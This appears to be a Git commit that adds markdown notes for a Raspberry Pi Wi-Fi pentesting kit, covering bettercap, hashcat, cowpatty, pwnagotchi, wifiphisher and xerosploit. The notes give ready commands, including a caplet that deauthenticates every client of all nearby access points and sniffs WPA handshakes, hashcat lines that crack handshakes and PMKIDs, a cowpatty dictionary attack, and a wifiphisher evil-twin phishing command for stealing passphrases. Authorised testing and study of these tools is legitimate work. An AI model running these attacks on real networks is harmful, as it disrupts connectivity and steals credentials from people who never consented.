wieerwill/MobilePenBerry
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merry Christmas

Browse Source
This commit is contained in:
WieErWill
2021-12-27 12:39:28 +01:00
commit 9db200cfc6
33 changed files with 3534 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

83
tools/bettercap.md Normal file
View File

@@ -0,0 +1,83 @@
# Bettercap
## Installing GO
As bettercap uses GO we will install this first. Update the number if Go got a newer version available.
```
wget https://go.dev/dl/go1.17.5.linux-armv6l.tar.gz
# extract to /usr/local/go
sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.17.5.linux-armv6l.tar.gz
```
We now need to add the PATH environment variable that are required for the system to recongize where the Golang is installed. To do that, edit the `~/.profile` file. Scroll all the way down to the end of the file and add the following:
```bash
PATH=$PATH:/usr/local/go/bin
GOPATH=$HOME/golang
```
Feel free to change the `GOPATH=$HOME/golang` to something else. Finally we need to make the system aware of the new profile, run `source ~/.profile`
Type `which go` to find out where the Golang installed and `go version` to see the installed version and platform.
## Installing Bettercap
Now, with GO installed, we are able to install Bettercap
```bash
sudo apt install libpcap-dev libnetfilter-queue-dev libusb-1.0-0-dev build-essential
go install github.com/bettercap/bettercap@latest
# copy bettercap to use it directly
sudo cp go/bin/bettercap /usr/bin/
# install the caplets and the web ui in /usr/local/share/bettercap and quit
sudo bettercap -eval "caplets.update; ui.update; quit"
```
### Workflow
### Adding Caplets to bettercap
We will save all Caplets in a shared folder: `cd /usr/share/bettercap/captlets`
A simple caplet can look like this:
```bash
# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
set $ {bold}😈 » {reset}
# make sure wlan0 is in monitor mode
# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
!monstop
!monstart
# every 5 seconds:
# - clear the screen
# - show the list of nearby access points
# - deauth every client from each one of them
set ticker.period 5
set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
# uncomment to only hop on these channels:
# wifi.recon.channel 1,2,3
wifi.recon on
ticker on
net.sniff on
# we'll see lots of probes after each deauth, just skip the noise ...
events.ignore wifi.client.probe
# start fresh
events.clear
clear
```
To start bettercap with this caplet run:
```bash
ifconfig wlan0 up
bettercap -iface wlan0 -caplet /usr/share/bettercap/caplets/<caplet-name>.cap
```
# Sources and more
[Evilsocket](https://www.evilsocket.net/2018/07/28/Project-PITA-Writeup-build-a-mini-mass-deauther-using-bettercap-and-a-Raspberry-Pi-Zero-W/)
[Bettercap](https://www.bettercap.org/)
[CyberPunk.rs](https://www.cyberpunk.rs/install-mitm-attack-framework-bettercap)

16
tools/cowpatty.md Normal file
View File

@@ -0,0 +1,16 @@
# coWPAtty
Brute-force dictionary attack against WPA-PSK/WPA2-PSK
```bash
sudo apt install git clang
git clone https://github.com/joswr1ght/cowpatty.git
cd cowpatty
make
make install
```
Example
```bash
./cowpatty -r eap-test.dump -f dict -s somethingclever
./cowpatty -r eap-test.dump -d hashfile -s somethingclever
```

62
tools/hashcat.md Normal file
View File

@@ -0,0 +1,62 @@
# Hashcat
Install Hashcat from source
```bash
sudo apt install build-essential cmake
git clone https://github.com/hashcat/hashcat.git
cd hashcat
sudo make
sudo make install
```
Install Hashcat legacy from source
```bash
sudo apt install git lzip make m4 mingw-w64
git clone https://github.com/hashcat/hashcat-legacy.git
cd hashcat
sudo ./tools/deps.sh
make linux
```
Install Hashcat from binary
```bash
sudo apt install p7zip-full -y
wget https://hashcat.net/files/hashcat-6.2.5.7z
7z x hashcat-6.2.5.7z
cd hashcat-6.2.5.7zcd
```
Install Hashcat-Utils
```bash
git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils
sudo make
```
## 4-way Handshake Cracking
Once we have succesfully captured the EAPOL frames required by hashcat in order to crack the PSK, well need to convert the pcap output file to the hccapx format that hashcat can read. In order to do so, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally:
```bash
/hashcat-util/cap2hccapx /wifi-handshakes.pcap wifi-handshakes.hccapx
```
You can now proceed to crack the handshake(s) either by dictionary attack or brute-force. For instance, to try all 8-digits combinations:
```bash
/hashcat/hashcat -m2500 -a3 -w3 wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
```
And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool … lets get to the fun part now :)
## PMKID Cracking
Well now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand, for this well use hcxpcaptool:
```bash
/hashcat-tools/hcxpcaptool -z wifi-handshakes.pmkid wifi-handshakes.pcap
```
We can now proceed cracking the wifi.handshake.pmkid file so generated by using algorithm number 16800:
```bash
/hashcat/hashcat -m16800 -a3 -w3 wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
```
# Sources and more
[Hashat](https://hashcat.net/wiki/)
[InfiniteLogins](https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/)

125
tools/pwnagotchi.md Normal file
View File

@@ -0,0 +1,125 @@
# Pwnagotchi
Pwnagotchi is a standalone project for RaspberryPi Zeros but can be installed on other Linux systems too.
You need to have [bettercap](bettercap.md) and `libpcap` installed.
```bash
sudo apt install libpcap0.8
```
## Bettercap Caplets
Depending on the name of the WiFi interface youre going to use, youll need to edit the `/usr/local/share/bettercap/caplets/pwnagotchi-auto.cap` and `/usr/local/share/bettercap/caplets/pwnagotchi-manual.cap` caplet files accordingly.
In the default Pwnagotchi image bettercap is running as a systemd service through a launcher script `/etc/systemd/system/bettercap.service` with the following content:
```bash
[Unit]
Description=bettercap api.rest service.
Documentation=https://bettercap.org
Wants=network.target
After=pwngrid.service
[Service]
Type=simple
PermissionsStartOnly=true
ExecStart=/usr/bin/bettercap-launcher
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
```
And this is `/usr/bin/bettercap-launcher`
```bash
#!/usr/bin/env bash
/usr/bin/monstart
if [[ $(ifconfig | grep usb0 | grep RUNNING) ]] || [[ $(cat /sys/class/net/eth0/carrier) ]]; then
# if override file exists, go into auto mode
if [ -f /root/.pwnagotchi-auto ]; then
/usr/bin/bettercap -no-colors -caplet pwnagotchi-auto -iface mon0
else
/usr/bin/bettercap -no-colors -caplet pwnagotchi-manual -iface mon0
fi
else
/usr/bin/bettercap -no-colors -caplet pwnagotchi-auto -iface mon0
fi
```
Again the interface name and the command to start the monitor mode need to be adjusted for the specific computer and WiFi card.
## PwnGrid
The second service we will need is pwngrid:
```bash
wget "https://github.com/evilsocket/pwngrid/releases/download/v1.10.3/pwngrid_linux_amd64_v1.10.3.zip"
unzip pwngrid_linux_amd64_v1.10.3.zip
sudo mv pwngrid /usr/bin/
# generate the keypair
sudo pwngrid -generate -keys /etc/pwnagotchi
```
Alternate make it yourself from source
```bash
git clone https://github.com/evilsocket/pwngrid.git
cd pwngrid
make
make install
```
Pwngrid runs via the `/etc/systemd/system/pwngrid-peer.service` systemd service, don't forget to change your interface
```bash
[Unit]
Description=pwngrid peer service.
Documentation=https://pwnagotchi.ai
Wants=network.target
[Service]
Type=simple
PermissionsStartOnly=true
ExecStart=/usr/bin/pwngrid -keys /etc/pwnagotchi -address 127.0.0.1:8666 -client-token /root/.api-enrollment.json -wait -log /var/log/pwngrid-peer.log -iface mon0
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
```
## PwnaGotchi
The last ingredient is going to be the python3 Pwnagotchi main codebase
```bash
wget "https://github.com/evilsocket/pwnagotchi/archive/v1.4.3.zip"
unzip v1.4.3.zip
cd pwnagotchi-1.4.3
sudo pip3 install -r requirements.txt
sudo pip3 install .
```
Also alternativ compile it yourself from source
```bash
git clone https://github.com/evilsocket/pwnagotchi.git
cd pwnagotchi
sudo pip3 install -r requirements.txt
make
sudo make install
```
Assuming both bettercap and pwngrid are configured and running correctly, we can now start pwnagotchi
```bash
# AUTO mode
sudo pwnagotchi
# AUTO mode with debug logs
sudo pwnagotchi --debug
# MANU mode
sudo pwnagotchi --manual
# MANU mode with debug logs
sudo pwnagotchi --manual --debug
# show the other options
pwnagotchi -h
```
This will install the default configuration file in `/etc/pwnagotchi/default.toml`, in order to apply customizations youll need to create a new `/etc/pwnagotchi/config.toml` file as explained in the configuration section.
## RPi Tweaks
1. having an ethernet port allows you an easier connection to the booted system. Just connect a cable to the port and Pwnagotchi get an IP address with DHCP. If a plugged ethernet cable is detected on boot it will start in MANU mode
2. in order to improve battery duration and reduce power requirements you can lower cpu frequency (underclocking). Edit your `/boot/config.txt` and add/uncomment the `arm_freq=800` line
3. to run the Pi3 you need at least 2.5A, but 2A should be enough if you underclocked
# Sources and more
[Pwnagotchi](https://pwnagotchi.ai)

24
tools/wifipisher.md Executable file
View File

@@ -0,0 +1,24 @@
# Wifipisher
Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with malware. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victims perspective, the attack takes place in three phases:
- Victim is deauthenticated from their access point.
- Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
- Victim is served a realistic specially-customized phishing page.
## install
Download the latest revision
```bash
git clone https://github.com/wifiphisher/wifiphisher.git
# Switch to tool's directory
cd wifiphisher
# Install any dependencies
apt-get install libnl-3-dev libnl-genl-3-dev
pip3 install PyRic pbkdf2
sudo python3 setup.py install
```
to use `wifiphisher -nJ --essid "FREE WI-FI" -p oauth-login -kB`
# Source and more informations
[Wifipisher](https://wifiphisher.org/docs.html)

12
tools/xerosploit.md Normal file
View File

@@ -0,0 +1,12 @@
# Xerosploit
Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.
Dependencies will be automatically installed.
```bash
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit
```
# Sources and more
[Xerosploit](https://github.com/LionSec/xerosploit)